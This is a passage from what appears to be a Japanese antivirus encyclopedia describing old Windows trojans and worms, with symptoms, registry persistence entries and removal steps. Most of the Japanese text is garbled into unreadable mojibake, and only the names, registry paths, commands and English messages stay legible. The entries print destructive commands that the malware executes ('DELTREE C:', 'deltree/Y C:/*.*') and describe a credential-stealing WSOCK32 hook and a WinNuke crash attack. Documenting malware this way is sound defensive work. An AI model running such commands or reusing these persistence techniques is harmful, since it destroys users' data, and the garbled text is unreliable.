¤¬.INI¡Ë¤ò¥é¥ó¥À¥à¤Ëºï½ü¤·¤Æ¤¤¤­¤Þ¤¹¡£¤³¤Î¤¿¤á¡¢ Windows¤Îµ¯Æ°¤¬¹Ô¤¨¤Ê¤¯¤Ê¤ë¾ì¹ç¤¬¤¢¤ê¤Þ¤¹¡£
È÷¡¡¡¡¹Í:****¼êưºï½ü¼ê½ç
¥ì¥¸¥¹¥È¥ê¥¨¥Ç¥£¥¿¤òÍøÍѤ·¤Æ¡¢¥ï¡¼¥à¤¬ºîÀ®¤· ¤¿¥ì¥¸¥¹¥È¥ê¥¨¥ó¥È¥ê¤ÎÃͤòºï½ü¤·¤Þ¤¹¡£
Windows9x¤Î¾ì¹ç:
HKEY_LOCAL_ MACHINES\Software\Microsoft\Windows\Currentversion\ Run
Agent5 = c:\zip01.exe

WindowsNT¤Î¾ì¹ç:
HKEY_LOCAL_MACHINES\Software\Microsoft\Windows NT\
CurrentVersion\WindowsNT\Run\Agent5 = c:\zip01.exe
¤³¤ì¤Ë¤è¤ê¥ï¡¼¥à¤Ï¼«Æ°µ¯Æ°¤¬¤Ç¤­¤Ê¤¯¤Ê¤ê¤Þ¤¹¤Î¤Ç ¥Þ¥·¥ó¤òºÆµ¯Æ°¤·¤Þ¤¹¡£
¥ï¡¼¥à¤¬C:\¤ËºîÀ®¤·¤¿2¤Ä¤Î¥Õ¥¡¥¤¥ë"ZIP01.EXE"¡¢"
VIDEO.EXE"¤òºï½ü¤·¤Þ¤¹¡£ ¡ô¤¹¤Ç¤ËÀßÄê¥Õ¥¡¥¤¥ë¤¬ºï½ü¤µ¤ìWindows¤¬µ¯Æ°¤Ç¤­¤Ê¤¯¤Ê ¤Ã¤Æ¤·¤Þ¤Ã¤¿¾ì¹ç¤ÏWindows¤ÎºÆ¥¤¥ó¥¹¥È¡¼¥ë¤¬É¬ÍפǤ¹¡£

TROJ_W95NUKER


̾¡¡¡¡¾Î:TROJ_W95NUKER

ÊÌ¡¡¡¡Ì¾:TROJAN_HORSE

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:N/A

¾Ü¡¡¡¡ºÙ:¤³¤Î¥¦¥¤¥ë¥¹¤ÏWINDOWS¾å¤Çưºî¤¹¤ë¥¯¥é¥Ã¥¯Ž¥
¥×¥í¥°¥é¥à¤Ç¤¢¤ëŽ¡¤³¤ì¤ò»È¤¦¤È狼¤Î¥Þ¥·¥ó¤ò¥Ï¥ó¥°¥¢¥Ã ¥×¤µ¤»¤ë¤³¤È¤¬¤Ç¤­¤ëŽ¡ 1)¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤Èޤ¥­¥Î¥³±À¤Èñññð¤Î³¨¤È¤È¤â¤Ëޤ ÂоݤΥޥ·¥ó¤ÎIP¥¢¥É¥ì¥¹¤ò»ØÄꤹ¤ë¥À¥¤¥¢¥í¥°¥Ü¥Ã¥¯¥¹ ¤¬É½¼¨¤µ¤ì¤ëŽ¡ 2)IP¥¢¥É¥ì¥¹¤ò»ØÄê¤·Ž¤[Nuke ME 95]¥Ü¥¿¥ó¤ò²¡¤¹¤Èޤ¼¡¤Î ¥á¥Ã¥»¡¼¥¸¤¬¸½¤ì¤ëŽ¡ "WinNuke V95 was designed to provide an effective way to test your networkagainst potential security hazards and should not be used for any maliciousintent. Do you agree?" 3)Ž¢¤Ï¤¤Ž£¤òÁªÂò¤¹¤ë¤Èޤ¼¡¤Î¥á¥Ã¥»¡¼¥¸¤¬¸½¤ì¤ëŽ¡
"Success: Target Nuked!"
ÂоݤΥޥ·¥ó¤Ï¥Ö¥ë¡¼¥Ñ¥Ë¥Ã¥¯¤òµ¯¤³¤·Ž¤¥Í¥Ã¥È¥ï¡¼¥¯¤ËÀÜ Â³¤Ç¤­¤Ê¤¯¤Ê¤ëŽ¡ ¤³¤Î¸½¾Ý¤ÏºÆµ¯Æ°¤¹¤ì¤Ðľ¤ëŽ¡
È÷¡¡¡¡¹Í: WinNuke ¤Ï Windows ¤Î OOB ÌäÂê¤ò¤Ä¤¯¥×¥í¥°
¥é¥à¤Ç¤¢¤ëŽ¡Íפ¹¤ë¤ËWindows95¤Î¥Ð¥°¤Çޤ TCP/IP ¤òÀѤó¤Ç ¤¤¤ë Windows¤Î TCP port 139 ¤Ë²¿¤«ÆÃ¼ì¤Ê Out-Of-Band ¥Ñ¥±¥Ã¥È¤òÁ÷¤ë¤È¤½¤Î¥Þ¥·¥ó¤Î¥Í¥Ã¥È¥ï¡¼¥¯µ¡Ç½¤¬¥¯¥é¥Ã ¥·¥å¤¹¤ë¤È¤¤¤¦ÌäÂê¤òÍøÍѤ·¤Æ¤¤¤ëŽ¡ ±Ñ¸ìÈÇWindows95¤Ë¤Ïޤ¤³¤ÎÌäÂê¤ò½¤Àµ¤¹¤ë¥Ñ¥Ã¥Á¤¬½Ð¤Æ¤¤ ¤ë¤¬Ž¤ÆüËܸìÈǤˤϤʤ¤Ž¡(¤·¤«¤·ÆüËܸìÈǤΠWindows 95 ¤Ç ¤â¤³¤Î¥Ñ¥Ã¥Á¤Ï»È¤¨¤ëÍͤǤ¢¤ëŽ¡ )Windows NT¤Ç¤ÏSP3¤ò ½¼¤Æ¤Æ¤¤¤ì¤ÐÌäÂê¤Ê¤¤Ž¡¤Þ¤¿Ž¤Windows98¤Ç¤âÌäÂê¤Ê¤¤Ž¡

TROJ_WINDUKE


̾¡¡¡¡¾Î:TROJ_WINDUKE

ÊÌ¡¡¡¡Ì¾:WINDUKE V1.0

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:14ޤ848 bytes

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:99/04

¾Ü¡¡¡¡ºÙ:¡¡-¡¡¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á¥×¥í¥°¥é¥à¤Ç¤¢¤ëŽ¡´¶
À÷³èư¤Ï¹Ô¤ï¤Ê¤¤Ž¡ -¡¡¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤Èޤ"DUKE"¤È¤¤¤¦Ì¾Á°¤Î¥Ü¥¿ ¥ó¤¬¤¢¤ë¥¦¥£¥ó¥É¥¦¤¬¸½¤ì¤ëŽ¡IP¥¢¥É¥ì¥¹¤òÆþÎϤ·¤¿¤ê¤¹¤ë ¤è¤¦¤ÊÍó¤â¤¢¤êޤ°ì¸«¤¹¤ë¤È²¿¤«¤Î¥Ä¡¼¥ë¤Î¤è¤¦ ¤Ç¤¢¤ë¤¬Ž¤"DUKE"¥Ü¥¿¥ó°Ê³°¤Ïưºî¤·¤Ê¤¤Ž¡ -¡¡¤³¤Î"DUKE"¥Ü¥¿¥ó¤ò¼Â¹Ô¤¹¤ë¤Èޤ"Application Error!!" ¤È¤¤¤¦¥á¥Ã¥»¡¼¥¸¤¬É½¼¨¤µ¤ìޤ¤½¤Î¸åޤ¥á¥Ã¥»¡¼¥¸¤¬¤¤¤¯¤Ä ¤«¸½¤ì¤ëŽ¡¼¡¤Ë" Fatal Error!!"¤È¤¤¤¦¥á¥Ã¥»¡¼¥¸¤¬²¿²ó¤«É½¼¨¤µ¤ì¤ÆŽ¤·ë¶É ¥Þ¥·¥ó¤òºÆµ¯Æ°¤µ¤»¤Ê¤±¤ì¤Ð¤Ê¤é¤Ê¤¤Ž¡
-¡¡¤·¤«¤·Ž¤¤³¤Î´Ö¤Ë¥¦¥¤¥ë¥¹¤Ï"C:\AUTOEXEC.BAT"¥Õ¥¡¥¤¥ë
¤ò°Ê²¼¤Î¤è¤¦¤Ë½ñ¤­´¹¤¨¤ëŽ¡
DELTREE C:
¤³¤ì¤Ë¤è¤Ã¤ÆŽ¤¼¡²óµ¯Æ°¤·¤¿ºÝ¤ËC¥É¥é¥¤¥Ö¤Î¤¹¤Ù¤Æ¤Î¥Õ¥¡ ¥¤¥ë¤¬ºï½ü¤µ¤ì¤ëŽ¡(¤·¤«¤·Ž¤ºÆµ¯Æ°»þ¤ËWindows¤Ë¤è¤Ã¤Æºï ½ü¤·¤Æ¤â¤è¤¤¤«¤Î³Îǧ¥á¥Ã¥»¡¼¥¸¤¬½Ð¤ë¤Î¤Çޤ¤³ ¤ì¤Ë¤¹¤Ù¤ÆNO¤ÈÅú¤¨¤ì¤Ðºï½ü¤µ¤ì¤ë¤³¤È¤Ï¤Ê¤¤Ž¡ -¡¡¤Þ¤¿Ž¤Æ±»þ¤Ëޤ¥ì¥¸¥¹¥È¥ê¤Î¥­¡¼¤ò½ñ¤­´¹¤¨Ž¤¤¹¤Ù¤Æ¤Î¥ê ¥ó¥¯¤ä¥·¥ç¡¼¥È¥«¥Ã¥È¤Ê¤É¤ò¤Ð¤é¤Ð¤é¤Ë¤·¤ÆWindowsOS¤¬¥¢ ¥¯¥»¥¹¤Ç¤­¤Ê¤¤¤è¤¦¤Ë¤·¤Æ¤·¤Þ¤¦Ž¡ºÆµ¯Æ°¤·¤¿ ¤È¤­¤ËޤWindows¤¬¥·¥¹¥Æ¥à¤Î¥»¥Ã¥È¥¢¥Ã¥×¤ò¤ä¤êľ¤½¤¦¤È ¤¹¤ë¤Î¤Ï¤³¤Î¤¿¤á¤Ç¤¢¤ëŽ¡(¼ÂºÝޤ³Æ¼ï¥É¥é¥¤¥Ð¡¼¤Î¥¤¥ó¥¹¥È ¡¼¥ëÅù¤ò¤ä¤êľ¤µ¤Ê¤±¤ì¤Ð¤Ê¤é¤Ê¤¤¾õÂÖ¤Ë´Ù¤Ã¤Æ ¤¤¤ëŽ¡
È÷¡¡¡¡¹Í:

TROJ_WINEXT.A


̾¡¡¡¡¾Î:TROJ_WINEXT.A

ÊÌ¡¡¡¡Ì¾:W95/Winext.worm¸À¡¡¡¡¸ì:±Ñ¸ì

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿,¥ï¡¼¥à

ÂС¡¡¡¾Ý:Win32

¥¦¥¤¥ë¥¹¥µ¥¤¥º:71,680 bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥á¡¼¥ë¤ò»ÈÍѤ·¤Æ³È»¶¤¹¤ë¥¿¥¤¥×¤Î¥ï
¡¼¥à¤Ç¤¹¡£´¶À÷¤¹¤ë¤È¡¢¼õ¿®¤·¤¿¥á¡¼¥ë¤ËÂФ·¤Æ¼«Æ°Åª¤Ë ¼«Ê¬¼«¿È¤òźÉÕ¤·¤ÆÁ÷¿®¤·¤Æ¤·¤Þ¤¤¤Þ¤¹¡£
´¶À÷ÊýË¡:
¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¡¢¤Þ¤º¡¢WINEXT.EXE¤È¤¤¤¦Ì¾Á°¤Ç ¼«Ê¬¼«¿È¤Î¥³¥Ô¡¼¤òºîÀ®¤·¤Þ¤¹¡£ºîÀ®¤µ¤ì¤ë¾ì½ê¤ÏOS¤Ë¤è ¤Ã¤Æ°Û¤Ê¤ê¡¢Windows95/98 ¤Î¾ì¹ç¤Ï¡¢\WINDOWS\SYSTEM\¥Ç ¥£¥ì¥¯¥È¥ê¡¢WindowsNT/2000¤Î¾ì¹ç¤Ï¡¢\WINNT\SYSTEM32\ ¥Ç¥£¥Æ¥¯¥È¥ê¤È¤Ê¤ê¤Þ¤¹¡£ ¼¡¤ËWindows95/98¤Ç¤Ï¡¢WINEXT.EXE¤òWIN.INI¥Õ¥¡ ¥¤¥ë¤ËÅÐÏ¿¤·¡¢¥·¥¹¥Æ¥à¤Îµ¯Æ°»þ¤Ë¥ï¡¼¥à¤¬É¬¤º¼Â¹Ô¤µ¤ì ¤ë¤è¤¦¤ËÀßÄꤷ¤Þ¤¹¡£
Windows:
¡Èrun=\WINDOWS\ SYSTEM\WINEXT.EXE¡É WindowsNT/2000¤Ç¤Ï°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¥¨¥ó¥È¥ê¤ËÅÐÏ¿¤·¡¢ ¥·¥¹¥Æ¥à¤Îµ¯Æ°»þ¤Ë¥ï¡¼¥à¤¬É¬¤º¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤷ ¤Þ¤¹¡£ HKEY_CURRENT_USER\Software\ Microsoft\Windows NT\CurrentVersion\Windows run = \WINNT\ SYSTEM32\WINEXT.EXE¡É
»³²:
MAPI¤ò»ÈÍѤ·¤¿¥á¡¼¥ë¥½¥Õ¥È¤ò»ÈÍѤ·¤Æ¤¤¤ë¤È¡¢¼õ¿®¤·¤¿ ¥á¡¼¥ë¤ËÂФ·¡¢¥ª¡¼¥È¥ê¥×¥é¥¤¤òÁõ¤Ã¤Æ¼«Ê¬¼«¿È¤òźÉÕ¤· ¤¿¥á¡¼¥ë¤òÁ÷¿®¤·¤Æ¤·¤Þ¤¤¤Þ¤¹¡£

TROJ_WINKILL


̾¡¡¡¡¾Î:TROJ_WINKILL

ÊÌ¡¡¡¡Ì¾:Trojan.Kill_Inst98, Kill98.Trojanʬ¡¡¡¡Îà:
¥È¥í¥¤¤ÎÌÚÇÏ·¿
¥¦¥¤¥ë¥¹¥µ¥¤¥º:5,682 bytes

¾Ü¡¡¡¡ºÙ:TROJ_WINKILL¡×¤Ï¡¢C¥É¥é¥¤¥Ö¤Ë¤¢¤ëÁ´¤Æ¤Î¥Õ¥¡
¥¤¥ë¤òºï½ü¤¹¤ëÇ˲õÎϤζ¯¤¤¿·¼ï¤Î¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë ¥¹¤Ç¤¹¡£¡¡ ¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤϰµ½Ì¤µ¤ì¤Æ¤¤¤Þ¤¹¡£À¾Îñ2000ǯ¤Ë¥Õ¥¡ ¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È²¼µ­¤Î¥³¥Þ¥ó¥É¤¬¼Â¹Ô¤µ¤ì¤Þ¤¹¡£
C:/windows/command/deltree/Y C:/*.* >NULL
C¥É¥é¥¤¥Ö¤Î¥Ç¥£¥ì¥¯¥È¥ê¤Ëdeltree¥Õ¥¡¥¤¥ë¤ò³Îǧ¤·¡¢³Î ǧ¤¹¤ë¤È¥¦¥¤¥ë¥¹¤ÏC¥É¥é¥¤¥Ö¤Î¤¹¤Ù¤Æ¤Î¥Õ¥¡¥¤¥ë¤òºï½ü¤· ¤Þ¤¹¡£Deltree¥Õ¥¡¥¤¥ë¤¬¥Ç¥£¥ì¥¯¥È¥ê¤Ë¤Ê¤¤¾ì¹ç¡¢¥³¥Þ¥ó ¥É¤Ï¼Â¹Ô¤µ¤ì¤Þ¤»¤ó¡£¡¡ ¾åµ­¤Î¥³¥Þ¥ó¥É¤¬¼Â¹Ô¤µ¤ì¤Æ¤¤¤ë´Ö¡¢²èÌ̾å¤Ë¤Ï²¿¤âɽ¼¨ ¤µ¤ì¤Þ¤»¤ó¡£¤³¤Î¤¿¤á¡¢¥æ¡¼¥¶¤Ï¥Õ¥¡¥¤¥ë¤¬¤¹¤Ç¤Ëºï½ü¤µ ¤ì¤Æ¤¤¤ë¤³¤È¤Ëµ¤¤Å¤¯¤³¤È¤¬¤Ç¤­¤Þ¤»¤ó¡£C¥É¥é¥¤¥Ö¤Ë¥¢¥¯ ¥»¥¹¤¹¤ë¤³¤È¤Ï¤Ç¤­¤Þ¤¹¤¬¡¢¤¹¤Ù¤Æ¤Î¥Õ¥¡¥¤¥ë¤¬ºï½ü¤µ¤ì ¤Æ¤¤¤Þ¤¹¡£

TROJ_WIPEOUT


̾¡¡¡¡¾Î:TROJ_WIPEOUT

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:DOS

¥¦¥¤¥ë¥¹¥µ¥¤¥º:50,616 bytes

¾Ü¡¡¡¡ºÙ:¥È¥í¥¤¤ÎÌÚÇÏ·¿¤Ç¤¢¤ë¡£´¶À÷¤Ï¤·¤Ê¤¤¡£
¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È°Ê²¼¤Î¥Æ¥­¥¹¥È¤ò¥°¥é¥Õ¥£¥Ã ¥¯¥â¡¼¥É¤Çɽ¼¨¤¹¤ë¡£ WIPEOUT Invasion 2401 If you are aware of Humble Guys, BBS Aholic, BBC, CCC, The old "Cemetary" net, or the "presence" of any related topic, this file is destructively explosive and people have lost many things by running this program with such action look for the ending (hint) - ^C if you want help - Underground Override by (Nxxxx xxxx)
Enter password if App: _
¡Ê¤³¤Î¥Õ¥¡¥¤¥ë¤ÏÈó¾ï¤ËÇ˲õŪ¤À¡¢¤³¤Î¥×¥í¥°¥é¥à¤òÁö¤é ¤»¤ë¤³¤È¤Ë¤è¤Ã¤Æ¡¢Â¿¤¯¤Î¿Í¤¬Â¿¤¯¤Î¤³¤È¤ò¼º¤Ã¤Æ¤­¤¿¡£ ¤â¤·App ¤Ç¤¢¤ë¤Ê¤é¡¢¥Ñ¥¹¥ï¡¼¥É¤òÆþ¤ì¤è¡£¤³¤Î¥×¥í¥°¥é ¥à¤òÃæ»ß¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¡£¡Ë ¤·¤«¤·¤³¤Î¥×¥í¥°¥é¥à¤Ë¥Ñ¥¹¥ï¡¼¥É¤ÏÍѰդµ¤ì¤Æ¤¤¤Ê¤¤¡£ ¥æ¡¼¥¶¡¼¤¬²¿¤«¥­¡¼¤ò²¡¤¹¤È¡¢°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤¬É½¼¨¤µ ¤ì¤ë¡£
Translating Data for Detected graphics : EGA best
possible) = 1¡Ä2¡Ä 3! Creating data for Player Classes, and NPC Data Chart xxxx ¡ÖXxx ¡×¤Î¤È¤³¤í¤Ç¡¢¿ô»ú¤¬1¤«¤é100000¤Þ¤Ç¥«¥¦¥ó¥È¤µ¤ì ¤ë¡£¤¢¤¿¤«¤âËÜÅö¤Ë¥Ç¡¼¥¿¤ò·×»»¤·¤Æ¤¤¤ë¤è¤¦¤Ç¤¢¤ë¤¬¡¢ ¼Â¤Ï¤³¤Î´Ö¤Ë¥Ï¡¼¥É¥Ç¥£¥¹¥¯Æâ¤Î¥Õ¥¡¥¤¥ë¤¬¤Ò¤È¤Ä¤Ò¤È¤Ä ºï½ü¤µ¤ì¤Æ¤¤¤ë¡£½¾¤Ã¤ÆºÆµ¯Æ°¤·¤è¤¦¤È¤·¤Æ¤â¥·¥¹¥Æ¥à¤¬ µ¯Æ°¤·¤Ê¤¯¤Ê¤Ã¤Æ¤·¤Þ¤¦¡£

TROJ_XTCP.200


̾¡¡¡¡¾Î:TROJ_XTCP.200

ÊÌ¡¡¡¡Ì¾:Ktcp.200

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win9x/NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:50,688 bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤ÏBackDoor ·Ï¤Î¥È¥í¥¤¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°
¥é¥à¤Ç¤¹¡£¤³¤Î¥×¥í¥°¥é¥à¤ò¥¤¥ó¥¹¥È¡¼¥ë¤¹¤ë¤È¡¢¥æ¡¼¥¶ ¤Î¥Ñ¥½¥³¥ó¤ò³°Éô¤«¤é¤ÎÉÔÀµ¥¢¥¯¥»¥¹¤ò¼õ¤±Æþ¤ì¤ë¤è¤¦¤Ë ¥·¥¹¥Æ¥à¤òÊѹ¹¤·¤Æ¤·¤Þ¤¤¤Þ¤¹¡£ ¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤÏINSTALL.EXE¤È¤¤¤¦Ì¾¾Î¤Î¥Õ¥¡¥¤¥ë¤È¤· ¤Æ¥á¡¼¥ë¤ÇÁ÷¤é¤ì¤Æ¤­¤¿¤ê¡¢¥À¥¦¥ó¥í¡¼¥É¥µ¥¤¥È¤ËÃÖ¤«¤ì ¤¿¤ê¤·¤Æ¤¤¤Þ¤¹¡£¤³¤Î¥Õ¥¡¥¤¥ë¤ò¤¦¤Ã¤«¤ê¼Â¹Ô¤·¤Æ¤·¤Þ¤¦
¤È¡¢c:\windows\system\winmsg32.exe¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºî
À®¤·¤Þ¤¹¡£¤³¤ì¤Ï¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤΥª¥ê¥¸¥Ê¥ë¥×¥í¥°¥é ¥àXTCP.EXE¤ò¥ê¥Í¡¼¥à¤·¤¿¤â¤Î¤Ç¤¹¡£ ¼¡¤Ë°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¥¨¥ó¥È¥ê¤ËÃͤòÄɲä·¡¢¥·¥¹¥Æ¥àµ¯ ư»þ¤Ëɬ¤º¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤷ¤Þ¤¹¡£ HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\ CURRENTVERSION\RUN
ÃÍ:MSGSV32 = c:\windows\system\winmsg32.exe

È÷¡¡¡¡¹Í:***¼êưºï½ü¼ê½ç¡Ê¶î½ü¤Ï¤Ç¤­¤Ê¤¤¡Ë
1)¥ì¥¸¥¹¥È¥ê¥¨¥Ç¥£¥¿¤Ç°Ê²¼¤ÎÃͤòºï½ü¤¹¤ë HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\ CURRENTVERSION\RUN
ÃÍ:MSGSV32 = c:\windows\system\winmsg32.exe
2)¥Þ¥·¥ó¤òºÆµ¯Æ°¤¹¤ë
3)c:\windows\system\winmsg32.exe¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºï½ü
¤¹¤ë ***¥ì¥¸¥¹¥È¥ê¤òÊѹ¹¤¹¤ë¤Î¤ÏÈó¾ï¤Ë¥Ç¥ê¥±¡¼¥È¤Ê¹Ô°Ù¤Ç¤¢ ¤êޤ¸í¤Ã¤¿Áàºî¤ò¹Ô¤¦¤Èޤ¥·¥¹¥Æ¥à¤Ë»½ý¤òÍ¿¤¨¤ë²ÄǽÀ­¤¬ ¤¢¤ê¤Þ¤¹Ž¡¥ì¥¸¥¹¥È¥ê¤Î½¤Éü¤Ï¿µ½Å¤Ë¹Ô¤Ã¤Æ¤¯¤À¤µ¤¤Ž¡

TROJ_Y2KCOUNT


̾¡¡¡¡¾Î:TROJ_Y2KCOUNT

ÊÌ¡¡¡¡Ì¾:Y2K COUNTDOWN TROJAN

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:22558¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ: ¤³¤ì¤Ï¥ï¡¼¥à¤ËʬÎव¤ì¤ëÉÔÀµ¥×¥í¥°¥é¥à
¤Ç¡¢¼Â¹Ô¤¹¤ë¤È¥Þ¥¤¥¯¥í¥½¥Õ¥È¼Ò¤«¤é¤Îȯ¿®¤òÁõ¤¤¡¢ Y2Kcount.exe¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òźÉÕ¤·¤¿ÅŻҥ᡼¥ë¤ò¾¡¼ê ¤ËÁ÷¿®¤·¤Þ¤¹¡£
¥á¡¼¥ë¤ÎÆâÍÆ¤Ï°Ê²¼¤ÎÄ̤ê:

From: support@microsoft.com

Sender: support@microsoft.com

Subject: Microsoft Announcement

Date: Wed, 15 Sep 1999 00:49:57 +0200
To All Microsoft Users, We are excited to announce Microsoft Year 2000 Counter. Start the countdown NOW. Let us all get in the 21 Century.Let us lead the way to the future and we will get YOU there FASTER and SAFER. Thank you,Microsoft Corporation ¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¡¢WinZIP¤Î¼«¸Ê²òÅà·¿°µ½Ì¥Õ ¥¡¥¤¥ë¤Î¥À¥¤¥¢¥í¥°¥Ü¥Ã¥¯¥¹¤òɽ¼¨¤·¤¿¸å¡¢°Ê²¼¤Î¤è¤¦¤Ê µ¶¤Î¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤·¤Þ¤¹¡£ Password protection error or invalid CRC32! ¤³¤Î´Ö¤Ë¡¢Windows\System¥Ç¥£¥ì¥¯¥È¥ê¤ËProclib.exe, Proclib.dll, Proclib16.dll, ntsvsrv.dll, Nlhvld.dll ¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºîÀ®¤·¤Þ¤¹¡£ ¤½¤·¤Æ¡¢System.ini¥Õ¥¡¥¤¥ë¤ÎÃæ¤Î[boot] ¥»¥¯¥·¥ç¥ó¤Î¡Ç drivers=¡Ç ¤Ë"ntsvsrv.dll" ¤òÉÕ¤±²Ã¤¨¡¢¼¡²óµ¯Æ°»þ¤Ë¼Â ¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤷ¤Þ¤¹¡£ _ ¤Þ¤¿¡¢WSOCK32.DLL¤Î¥ª¥ê¥¸¥Ê¥ë¤òNLHVLD.DLL¤È¤¤¤¦Ì¾¾Î¤Ç Ê£À½¤·¤ÆÊݸ¤·¤¿¸å¡¢PROCLIB16.DLL¤ÇWSOCK32.DLL¤ò¾å½ñ ¤­¤·¤Æ¤·¤Þ¤¤¤Þ¤¹¡£¤³¤ì¤Ë¤è¤Ã¤Æ¡¢¥ï¡¼¥à¤Ï¥Í¥Ã¥È¥ï¡¼¥¯ Àܳ¤Ë¥Õ¥Ã¥¯¤·¡¢É¬¤ºproclib.exe ¤¬¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀß Äꤷ¤Þ¤¹¡£ PROCLIB16.DLL ¤Ïµ¼»÷Ū¤ËWSOCK32.DLL ¤È¤·¤Æµ¡Ç½¤·¡¢Á÷ ¼õ¿®¤·¤¿¥á¡¼¥ë¤òÁöºº¤·¡¢¡Ö¥Ñ¥¹¥ï¡¼¥É¡×¡¢¡Ö¥í¥°¥¤¥ó¡× ¤È¡Ö¥æ¡¼¥¶Ì¾¡×¤È¤¤¤¦¥Æ¥­¥¹¥È¤ò¸¡º÷¡¢¥ï¡¼¥à¤Îºî¼Ô¤ËÁ÷ ¿®¤¹¤ë¤³¤È¤òÌÜŪ¤Ë¤·¤Æ¤¤¤ë¤è¤¦¤Ç¤¹¡£
È÷¡¡¡¡¹Í:***¼êưºï½ü¼ê½ç****
¡Ê¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿¤Ç¤¢¤ë¤¿¤á¥¢¥ó¥Á¥¦¥¤¥ë¥¹¥½¥Õ¥È ¤Ç¶î½ü¤¹¤ë¤³¤È¤Ï¤Ç¤­¤Þ¤»¤ó¡£¡Ë 1. System.ini¥Õ¥¡¥¤¥ë¤ÎÃæ¤Î[boot] ¥»¥¯¥·¥ç¥ó¤Î¡Ç drivers=¡Ç ¤Ë¤¢¤ë"ntsvsrv.dll" ¤òºï½ü¤·¤Þ¤¹¡£ 2. ¥Þ¥·¥ó¤òºÆµ¯Æ°¤·¤Þ¤¹¡£¤³¤Î¤È¤­¡¢¤¤¤«¤Ê¤ë¥Í¥Ã¥È¥ï ¡¼¥¯Àܳ¤â¹Ô¤ï¤Ê¤¤¤Ç¤¯¤À¤µ¤¤¡£ 3. WINDOWS\SYSTEM\WSOCK32.DLL¤ò"WSOCK32.BAK"¤È¥ê¥Í ¡¼¥à¤·¤¿¸å¡¢WINDOWS\SYSTEM\Nlhvld.dll ¥Õ¥¡¥¤¥ë¤ò¡¢" WSOCK32.DLL"¤È¥Õ¥¡¥¤¥ë̾¤òÊѹ¹¤·¤Æ¤¯¤À¤µ¤¤¡£¤â¤·¡¢¡Ö WSOCK32.DLL¤Ï¥·¥¹¥Æ¥à¤¬»ÈÍÑÃæ¤Ç¤¢¤ë¤¿¤á¥Õ¥¡¥¤¥ë̾¤òÊÑ ¹¹¤Ç¤­¤Þ¤»¤ó¡×¤È¤¤¤¦¥¨¥é¡¼¥á¥Ã¥»¡¼¥¸¤¬½Ð¤¿¾ì¹ç¤Ï¡¢¤¹ ¤Ù¤Æ¤Î¥Í¥Ã¥È¥ï¡¼¥¯¥¢¥×¥ê¥±¡¼¥·¥ç¥ó¤ò½ªÎ»¤µ¤»¤ë¤«¡¢¤â ¤·¤¯¤Ï¡¢µ¯Æ°ÍÑ¥Õ¥í¥Ã¥Ô¡¼¥Ç¥£¥¹¥¯¤Çµ¯Æ°¤·¤ÆDOS¥â¡¼¥É¤Ç ºî¶È¤·¤Æ¤¯¤À¤µ¤¤¡£ 4. °Ê²¼¤Î¥Õ¥¡¥¤¥ë¤òºï½ü¤·¤Æ¤¯¤À¤µ¤¤¡£ Proclib.exeProclib.dllProclib16.dllntsvsrv. dllNlhvld.dll _ ¤³¤ì¤é¤Ï WINDOWS\SYSTEM ¥Ç¥£¥ì¥¯¥È¥ê¤Ë¤¢¤ê¤Þ¤¹¡£

TROJ_ZELU


̾¡¡¡¡¾Î:TROJ_ZELU

ÊÌ¡¡¡¡Ì¾:ZELU.TROJAN

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:24,944 bytes

ȯ¾ÍÃÏ:US

ȯ¸«Æü:1999/12/31

¾Ü¡¡¡¡ºÙ:¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤϡ¢Y2K¥Ð¥°½¤Àµ¥×¥í¥°¥é¥à¤ò
